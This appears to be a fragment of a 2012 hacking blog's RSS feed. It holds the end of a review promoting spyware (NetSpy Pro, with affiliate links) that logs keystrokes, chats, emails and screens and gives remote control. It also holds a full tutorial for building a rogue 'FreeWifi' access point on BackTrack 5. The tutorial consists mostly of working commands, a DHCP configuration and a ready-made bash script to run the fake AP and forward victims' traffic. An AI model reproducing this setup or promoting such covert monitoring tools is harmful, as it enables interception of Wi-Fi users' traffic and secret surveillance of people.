&lt;li&gt;&lt;div align="LEFT" style="text-decoration: none;"&gt;&lt;b&gt;&lt;span style="color: black; font-size: small;"&gt;HTTPS  Secured Control Panel &lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;&lt;div align="LEFT" style="text-decoration: none;"&gt;&lt;b&gt;&lt;span style="color: black; font-size: small;"&gt;Remote  System Information &lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;&lt;div align="LEFT" style="text-decoration: none;"&gt;&lt;b&gt;&lt;span style="color: black; font-size: small;"&gt;Searchable  Logs &lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;&lt;div align="LEFT" style="text-decoration: none;"&gt;&lt;b&gt;&lt;span style="color: black; font-size: small;"&gt;Remotely  Deployable &lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;&lt;div align="LEFT" style="text-decoration: none;"&gt;&lt;b&gt;&lt;span style="color: black; font-size: small;"&gt;Remote  Uninstall&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;div align="CENTER" style="font-family: inherit;"&gt;&lt;b&gt;&lt;span style="color: blue; font-size: small;"&gt;&lt;u&gt;&lt;a href="https://www.plimus.com/jsp/redirect.jsp?contractId=3092906&amp;amp;referrer=887890" target="_blank"&gt;Download&lt;/a&gt;&lt;/u&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;h3 align="CENTER" class="western" style="font-family: inherit;"&gt;&lt;a href="https://www.plimus.com/jsp/redirect.jsp?contractId=2965562&amp;amp;referrer=887890"&gt;          &lt;style type="text/css"&gt;
 &lt;!--
  @page { margin: 0.79in }
  P { margin-bottom: 0.08in }
  H3 { margin-bottom: 0.08in }
  H3.western { font-family: "Arial", sans-serif }
  A:link { so-language: zxx }
 --&gt;
 
&lt;/style&gt;   &lt;/a&gt;&lt;/h3&gt;&lt;h3 align="CENTER" class="western"&gt;&lt;span style="color: blue;"&gt;&lt;u&gt;&lt;a href="https://www.plimus.com/jsp/redirect.jsp?contractId=2965562&amp;amp;referrer=887890" target="_blank"&gt;NetSpy Pro&lt;/a&gt;&lt;/u&gt;&lt;/span&gt;&lt;/h3&gt;&lt;div align="LEFT" style="font-family: inherit;"&gt;&lt;b&gt;&lt;span style="color: black; font-size: small;"&gt;&lt;span style="text-decoration: none;"&gt;It is an amazing product that has an ability to monitor the entire network, &lt;/span&gt;Net Spy Pro is the latest in employee network monitoring software. This program allows you to monitor and control all user activity on your network in real time from your own workstation.&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div align="LEFT" style="font-family: inherit;"&gt;&lt;b&gt;&lt;span style="color: black; font-size: small;"&gt;Some features:&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;ul style="font-family: inherit;"&gt;&lt;a href="https://www.plimus.com/jsp/redirect.jsp?contractId=2965562&amp;amp;referrer=887890" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;" target="_blank"&gt;&lt;img border="0" height="200" src="http://2.bp.blogspot.com/-OxyxVqzYZWY/T15G7rjpnhI/AAAAAAAABDc/oima3gUF6yg/s200/netspy_box.jpg" width="134" /&gt;&lt;/a&gt;
&lt;li&gt;&lt;div align="LEFT"&gt;&lt;b&gt;&lt;span style="color: black; font-size: small;"&gt;View Real Time Screens,  Events and Keystrokes! &lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;&lt;div align="LEFT"&gt;&lt;b&gt;&lt;span style="color: black; font-size: small;"&gt;View Browser Favorites &lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;&lt;div align="LEFT"&gt;&lt;b&gt;&lt;span style="color: black; font-size: small;"&gt;View Open Ports &lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;&lt;div align="LEFT"&gt;&lt;b&gt;&lt;span style="color: black; font-size: small;"&gt;View Active Processes,  Services and System Info &lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;&lt;div align="LEFT"&gt;&lt;b&gt;&lt;span style="color: black; font-size: small;"&gt;Chat / IM Conversations &lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;&lt;div align="LEFT"&gt;&lt;b&gt;&lt;span style="color: black; font-size: small;"&gt;Keystrokes Typed &lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;&lt;div align="LEFT"&gt;&lt;b&gt;&lt;span style="color: black; font-size: small;"&gt;Web Sites Visited &lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;&lt;div align="LEFT"&gt;&lt;b&gt;&lt;span style="color: black; font-size: small;"&gt;Emails Typed or Viewed &lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;&lt;div align="LEFT"&gt;&lt;b&gt;&lt;span style="color: black; font-size: small;"&gt;Applications Executed &lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;&lt;div align="LEFT"&gt;&lt;b&gt;&lt;span style="color: black; font-size: small;"&gt;Screenshots Capturing &lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;&lt;div align="LEFT"&gt;&lt;b&gt;&lt;span style="color: black; font-size: small;"&gt;Full Remote Control&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;div align="CENTER" style="font-family: inherit;"&gt;&lt;b&gt;&lt;span style="color: blue; font-size: small;"&gt;&lt;u&gt;&lt;a href="https://www.plimus.com/jsp/redirect.jsp?contractId=2965562&amp;amp;referrer=887890" target="_blank"&gt;Download&lt;/a&gt;&lt;/u&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style="font-family: inherit;"&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style="font-family: inherit;"&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div dir="ltr" style="font-family: inherit; text-align: left;" trbidi="on"&gt;&lt;br /&gt;
&lt;div&gt;&lt;script src="http://connect.facebook.net/en_US/all.js#xfbml=1"&gt;
&lt;/script&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;&lt;fb:like href="http://www.ehacking.net/" show_faces="true" width="450"&gt;&lt;/fb:like&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style="color: red;"&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;Note: If you want to learn more about Linux and Windows based Penetration testing, you might want to subscribe our &lt;a href="http://feeds.feedburner.com/ehacking"&gt;RSS feed&lt;/a&gt; and &lt;a href="http://feedburner.google.com/fb/a/mailverify?uri=ehacking&amp;amp;loc=en_US"&gt;Email Subscription&lt;/a&gt;&amp;nbsp; or become our &lt;a href="http://www.facebook.com/Beautyofthebaud"&gt;Facebook fan&lt;/a&gt;! You will get all the latest updates at both the places.&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3964176871415674890-1606278231825757136?l=www.ehacking.net' alt='' /&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=y-2YuLg4n50:c2LKhc-hCBY:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=y-2YuLg4n50:c2LKhc-hCBY:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?i=y-2YuLg4n50:c2LKhc-hCBY:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=y-2YuLg4n50:c2LKhc-hCBY:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=y-2YuLg4n50:c2LKhc-hCBY:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?i=y-2YuLg4n50:c2LKhc-hCBY:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=y-2YuLg4n50:c2LKhc-hCBY:F7zBnMyn0Lo"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?i=y-2YuLg4n50:c2LKhc-hCBY:F7zBnMyn0Lo" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=y-2YuLg4n50:c2LKhc-hCBY:gIN9vFwOqvQ"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?i=y-2YuLg4n50:c2LKhc-hCBY:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=y-2YuLg4n50:c2LKhc-hCBY:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=y-2YuLg4n50:c2LKhc-hCBY:TzevzKxY174"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?d=TzevzKxY174" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=y-2YuLg4n50:c2LKhc-hCBY:7Q72WNTAKBA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?d=7Q72WNTAKBA" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/ehacking/~4/y-2YuLg4n50" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/ehacking/~3/y-2YuLg4n50/spy-softwares-keyloggers-rat-review.html</link><author>noreply@blogger.com (Irfan Shakeel)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/-hY9QSxVB1bE/T15IjDPBylI/AAAAAAAABDk/Ahmz5PNPXAA/s72-c/keylogger.png" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://www.ehacking.net/2012/03/spy-softwares-keyloggers-rat-review.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3964176871415674890.post-7790614758801753686</guid><pubDate>Sat, 10 Mar 2012 15:29:00 +0000</pubDate><atom:updated>2012-03-10T07:30:00.803-08:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Tutorial</category><category domain="http://www.blogger.com/atom/ns#">Review</category><category domain="http://www.blogger.com/atom/ns#">EH Security</category><category domain="http://www.blogger.com/atom/ns#">Wireless</category><category domain="http://www.blogger.com/atom/ns#">News</category><category domain="http://www.blogger.com/atom/ns#">Rogue Access Point</category><category domain="http://www.blogger.com/atom/ns#">Backtrack5</category><title>How to Create a Fake Access Point Backtrack 5</title><description>&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/pGuWDufxGhZdndj5OxukhrUGKxE/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/pGuWDufxGhZdndj5OxukhrUGKxE/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/pGuWDufxGhZdndj5OxukhrUGKxE/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/pGuWDufxGhZdndj5OxukhrUGKxE/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;div style="font-family: inherit;"&gt;&lt;style type="text/css"&gt;
 &lt;!--
  @page { margin: 0.79in }
  P { margin-bottom: 0.08in }
  PRE.cjk { font-family: "DejaVu Sans", monospace }
  TD P { margin-bottom: 0in }
  A:link { so-language: zxx }
 --&gt;
 
&lt;/style&gt;   &lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://www.ehacking.net/2012/03/how-to-create-fake-access-point.html" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;" target="_blank"&gt;&lt;img border="0" height="180" src="http://1.bp.blogspot.com/-zkTJUn8gAl0/T1sDvVtnS9I/AAAAAAAABC0/19JNtqVu3AE/s200/200px-Wifi_logo.jpg" width="220" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="font-family: inherit; margin-bottom: 0in;"&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;Rouge access point or a fake access point is the real threat for WiFi users, &lt;a href="http://www.ehacking.net/2011/07/airsnarf-rogue-access-point.html"&gt;&lt;span style="color: blue;"&gt;&lt;span style="text-decoration: none;"&gt;Airsnarf - Rogue Access Point&lt;/span&gt;&lt;/span&gt;&lt;/a&gt; and &lt;a href="http://www.ehacking.net/2011/08/karmetasploit-backtrack-5-tutorial.html"&gt;&lt;span style="color: blue;"&gt;&lt;span style="text-decoration: none;"&gt;Karmetasploit- Backtrack 5 Tutorial&lt;/span&gt;&lt;/span&gt;&lt;/a&gt; has been discussed before and in this article I will a wonder tutorial from a wonderful that discuss how to create a fake access point on backtrack 5. There are a lot of Tutorials and Scripts for setting up a Fake AP, &amp;nbsp;The “Gerix” &amp;nbsp;tool also have an option to auto set a Fake AP (for some reason this tool never worked for me).&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="font-family: inherit; margin-bottom: 0in;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="font-family: inherit; margin-bottom: 0in;"&gt;&lt;/div&gt;&lt;div style="font-family: inherit; margin-bottom: 0in;"&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;I started to setup my fake AP and had run into some trouble for a strange reason.&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style="font-family: inherit;"&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;I decided to put my experience here hopefully you’ll find it useful.&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style="font-family: inherit;"&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;Started by putting my Wlan interface in monitor mode&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;blockquote class="tr_bq"&gt;&lt;pre class="western" style="color: #444444; font-family: inherit;"&gt;&lt;span style="color: #444444; font-size: small;"&gt;root@Blackbox:~/fakeap# &lt;b&gt;airmon-ng start wlan1&lt;/b&gt;&lt;/span&gt;&lt;span style="font-size: small;"&gt;
Found 1 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
PID     Name
1558    dhclient
Interface       Chipset         Driver
wlan1           Realtek RTL8187L        rtl8187 - [phy1]SIOCSIFFLAGS: Unknown error 132
                                (monitor mode enabled on mon0)&lt;/span&gt;&lt;/pre&gt;&lt;/blockquote&gt;&lt;div style="font-family: inherit; margin-bottom: 0in;"&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;I noticed the following error: “Unknown error 132″&lt;br /&gt;
Tried using airodump-ng to see what happens…&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style="font-family: inherit; margin-bottom: 0in;"&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/b&gt; &lt;/div&gt;&lt;blockquote class="tr_bq"&gt;&lt;pre class="western" style="color: #444444; font-family: inherit;"&gt;&lt;span style="font-size: small;"&gt;root@Blackbox:~/fakeap# &lt;b&gt;airodump-ng mon0&lt;/b&gt;
ioctl(SIOCSIFFLAGS) failed: Unknown error 132&lt;/span&gt;&lt;/pre&gt;&lt;/blockquote&gt;&lt;div style="font-family: inherit;"&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;Got the same error.&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style="font-family: inherit;"&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;The solution was simply to unload the RTL8187 and Load the R8187 driver instead as follows:&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;blockquote class="tr_bq"&gt;&lt;pre class="western" style="color: #444444; font-family: inherit;"&gt;&lt;span style="font-size: small;"&gt;root@Blackbox:~/fakeap# &lt;b&gt;rmmod rtl8187&lt;/b&gt;
root@Blackbox:~/fakeap# &lt;b&gt;modprobe r8187&lt;/b&gt;&lt;/span&gt;&lt;/pre&gt;&lt;/blockquote&gt;&lt;div style="font-family: inherit;"&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;Tried putting wlan In monitor mode again&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;blockquote class="tr_bq"&gt;&lt;pre class="western" style="color: #444444; font-family: inherit;"&gt;&lt;span style="font-size: small;"&gt;root@Blackbox:~/fakeap# &lt;b&gt;airmon-ng start wlan1&lt;/b&gt;
Found 1 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
PID     Name
1558    dhclient
Interface       Chipset         Driver
wlan1           RTL8187         r8187 (monitor mode enabled)&lt;/span&gt;&lt;/pre&gt;&lt;/blockquote&gt;&lt;div style="font-family: inherit;"&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;Well, that fixed the problem&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;blockquote class="tr_bq"&gt;&lt;pre class="western" style="color: #444444; font-family: inherit;"&gt;&lt;span style="font-size: small;"&gt;root@Blackbox:~/fakeap# &lt;b&gt;iwconfig&lt;/b&gt;
lo        no wireless extensions.
eth3      no wireless extensions.
wlan1     802.11b/g  Mode:Monitor  Channel=10  Bit Rate=11 Mb/s
          Tx-Power=5 dBm
          Retry:on   Fragment thr:off
          Link Quality=0/100  Signal level=50 dBm  Noise level=-156 dBm
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
          Tx excessive retries:0  Invalid misc:0   Missed beacon:0&lt;/span&gt;&lt;/pre&gt;&lt;/blockquote&gt;&lt;div style="font-family: inherit;"&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;Now we can proceed to the fake ap setup process&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style="font-family: inherit;"&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;1. Install a DHCP Server&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;blockquote class="tr_bq"&gt;&lt;pre class="western" style="font-family: inherit; margin-bottom: 0.2in;"&gt;&lt;span style="font-size: small;"&gt;apt-get install dhcp3-server&lt;/span&gt;&lt;/pre&gt;&lt;/blockquote&gt;&lt;div style="font-family: inherit;"&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;2. Edit “/etc/dhcp3/dhcpd.conf” as follows (You can change ip address, pool and dns server as needed):&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;blockquote class="tr_bq"&gt;&lt;pre class="western" style="color: #444444; font-family: inherit;"&gt;&lt;span style="font-size: small;"&gt;ddns-update-style ad-hoc;
default-lease-time 600;
max-lease-time 7200;
authoritative;
subnet 10.0.0.0 netmask 255.255.255.0 {
option subnet-mask 255.255.255.0;
option broadcast-address 10.0.0.255;
option routers 10.0.0.254;
option domain-name-servers 8.8.8.8;
range 10.0.0.1 10.0.0.140;
}&lt;/span&gt;&lt;/pre&gt;&lt;/blockquote&gt;&lt;div style="font-family: inherit;"&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;3. Put your wlan in monitor mode&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;blockquote class="tr_bq"&gt;&lt;pre class="western" style="color: #444444; font-family: inherit; margin-bottom: 0.2in;"&gt;&lt;span style="font-size: small;"&gt;airmon-ng start wlan1&lt;/span&gt;&lt;/pre&gt;&lt;/blockquote&gt;&lt;div style="font-family: inherit;"&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;4. Start airbase-ng, you will need to specify the AP SSID and channel number&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;blockquote class="tr_bq"&gt;&lt;pre class="western" style="color: #444444; font-family: inherit; margin-bottom: 0.2in;"&gt;&lt;span style="font-size: small;"&gt;airbase-ng -e FreeWifi -c 11 -v wlan1 &amp;amp;&lt;/span&gt;&lt;/pre&gt;&lt;/blockquote&gt;&lt;div style="font-family: inherit;"&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;5. Airbase will create a new adapter “at0″ you will need to enable it and assign it with an ip address and subnet mask, the ip address you assign to this interface will be the default gateway that you specified in the dhcpd.conf file.&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;blockquote class="tr_bq"&gt;&lt;pre class="western" style="color: #444444; font-family: inherit;"&gt;&lt;span style="font-size: small;"&gt;ifconfig at0 up
ifconfig at0 10.0.0.254 netmask 255.255.255.0&lt;/span&gt;&lt;/pre&gt;&lt;/blockquote&gt;&lt;div style="font-family: inherit;"&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;6. Add a route&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;blockquote class="tr_bq"&gt;&lt;pre class="western" style="color: #444444; font-family: inherit; margin-bottom: 0.2in;"&gt;&lt;span style="font-size: small;"&gt;route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.254&lt;/span&gt;&lt;/pre&gt;&lt;/blockquote&gt;&lt;div style="font-family: inherit;"&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;7. Setup ip tables&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;blockquote class="tr_bq"&gt;&lt;pre class="western" style="color: #444444; font-family: inherit;"&gt;&lt;span style="font-size: small;"&gt;iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -P FORWARD ACCEPT&lt;/span&gt;&lt;/pre&gt;&lt;/blockquote&gt;&lt;div style="font-family: inherit;"&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt; • Eth3 is my external interface which is connected to the internet change it to whatever yours is&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;blockquote class="tr_bq"&gt;&lt;pre class="western" style="color: #444444; font-family: inherit; margin-bottom: 0.2in;"&gt;&lt;span style="font-size: small;"&gt;iptables -t nat -A POSTROUTING -o eth3 -j MASQUERADE&lt;/span&gt;&lt;/pre&gt;&lt;/blockquote&gt;&lt;div style="font-family: inherit;"&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;8. Clear dhcp leases&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;blockquote class="tr_bq"&gt;&lt;pre class="western" style="color: #444444; font-family: inherit; margin-bottom: 0.2in;"&gt;&lt;span style="font-size: small;"&gt;echo &amp;gt; '/var/lib/dhcp3/dhcpd.leases'&lt;/span&gt;&lt;/pre&gt;&lt;/blockquote&gt;&lt;div style="font-family: inherit;"&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;9. Create a symlink to dhcpd.pid (skipping this may cause an error when starting dhcp server)&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;blockquote class="tr_bq"&gt;&lt;pre class="western" style="color: #444444; font-family: inherit; margin-bottom: 0.2in;"&gt;&lt;span style="font-size: small;"&gt;ln -s /var/run/dhcp3-server/dhcpd.pid /var/run/dhcpd.pid&lt;/span&gt;&lt;/pre&gt;&lt;/blockquote&gt;&lt;div style="font-family: inherit;"&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;10. Start the DHCP server&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;blockquote class="tr_bq"&gt;&lt;pre class="western" style="color: #444444; font-family: inherit; margin-bottom: 0.2in;"&gt;&lt;span style="font-size: small;"&gt;dhcpd3 -d -f -cf /etc/dhcp3/dhcpd.conf at0 &amp;amp;&lt;/span&gt;&lt;/pre&gt;&lt;/blockquote&gt;&lt;div style="font-family: inherit;"&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;11. Don’t forget to enable IP forwarding&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;blockquote class="tr_bq"&gt;&lt;pre class="western" style="color: #444444; font-family: inherit; margin-bottom: 0.2in;"&gt;&lt;span style="font-size: small;"&gt;echo "1" &amp;gt; /proc/sys/net/ipv4/ip_forward&lt;/span&gt;&lt;/pre&gt;&lt;/blockquote&gt;&lt;div style="font-family: inherit;"&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;That’s All Folks!&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style="font-family: inherit;"&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;I have created a simple bash script to automate this process you will just need to change it &amp;nbsp;to suit your configuration.&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;  &lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;table border="0" cellpadding="0" cellspacing="0" style="font-family: inherit; width: 665px;"&gt;&lt;colgroup&gt;&lt;col width="18"&gt;&lt;/col&gt;&lt;/colgroup&gt;&lt;colgroup&gt;&lt;col width="646"&gt;&lt;/col&gt;  &lt;/colgroup&gt;&lt;tbody&gt;
&lt;tr&gt;   &lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;blockquote&gt;&lt;br /&gt;
&lt;/blockquote&gt;&lt;table border="0" cellpadding="0" cellspacing="0" style="font-family: inherit; width: 665px;"&gt;&lt;tbody&gt;
&lt;tr&gt;   &lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;blockquote&gt;&lt;blockquote&gt;&lt;span style="font-size: small;"&gt;#!/bin/bash&lt;br /&gt;
&lt;br /&gt;
echo "Killing Airbase-ng..."&lt;br /&gt;
pkill    airbase-ng&lt;br /&gt;
sleep 2;&lt;br /&gt;
echo "Killing DHCP..."&lt;br /&gt;
pkill    dhcpd3&lt;br /&gt;
sleep 5;&lt;br /&gt;
&lt;br /&gt;
echo "Putting Wlan In Monitor    Mode..."&lt;br /&gt;
airmon-ng stop wlan1 # Change to your wlan    interface&lt;br /&gt;
sleep 5;&lt;br /&gt;
airmon-ng start wlan1 # Change to your    wlan interface&lt;br /&gt;
sleep 5;&lt;br /&gt;
echo "Starting Fake    AP..."&lt;br /&gt;
airbase-ng -e FreeWifi -c 11 -v wlan1 &amp;amp;amp; #    Change essid, channel and interface&lt;br /&gt;
sleep 5;&lt;br /&gt;
&lt;br /&gt;
ifconfig    at0 up&lt;br /&gt;
ifconfig at0 10.0.0.254 netmask 255.255.255.0 # Change    IP addresses as configured in your dhcpd.conf&lt;br /&gt;
route add -net    10.0.0.0 netmask 255.255.255.0 gw 10.0.0.254&lt;br /&gt;
&lt;br /&gt;
sleep    5;&lt;br /&gt;
&lt;br /&gt;
iptables --flush&lt;br /&gt;
iptables --table nat    --flush&lt;br /&gt;
iptables --delete-chain&lt;br /&gt;
iptables --table nat    --delete-chain&lt;br /&gt;
iptables -P FORWARD ACCEPT&lt;br /&gt;
iptables -t nat -A    POSTROUTING -o eth3 -j MASQUERADE # Change eth3 to your internet    facing interface&lt;br /&gt;
&lt;br /&gt;
echo &amp;amp;gt;    '/var/lib/dhcp3/dhcpd.leases'&lt;br /&gt;
ln -s    /var/run/dhcp3-server/dhcpd.pid /var/run/dhcpd.pid&lt;br /&gt;
dhcpd3 -d -f    -cf /etc/dhcp3/dhcpd.conf at0 &amp;amp;amp;&lt;br /&gt;
&lt;br /&gt;
sleep 5;&lt;br /&gt;
echo    "1" &amp;amp;gt; /proc/sys/net/ipv4/ip_forward&lt;/span&gt;&lt;/blockquote&gt;&lt;/blockquote&gt;&lt;table border="0" cellpadding="0" cellspacing="0" style="font-family: inherit; width: 665px;"&gt;&lt;tbody&gt;
&lt;tr&gt;  &lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;div style="font-family: inherit; margin-bottom: 0in;"&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/b&gt; &lt;/div&gt;&lt;div style="font-family: inherit;"&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style="font-family: inherit;"&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;The over all credit goes to &lt;a href="http://exploit.co.il/hacking/set-fake-access-point-backtrack5/" target="_blank"&gt;Exploit KB&lt;/a&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style="font-family: inherit;"&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style="font-family: inherit;"&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div dir="ltr" style="font-family: inherit; text-align: left;" trbidi="on"&gt;&lt;br /&gt;
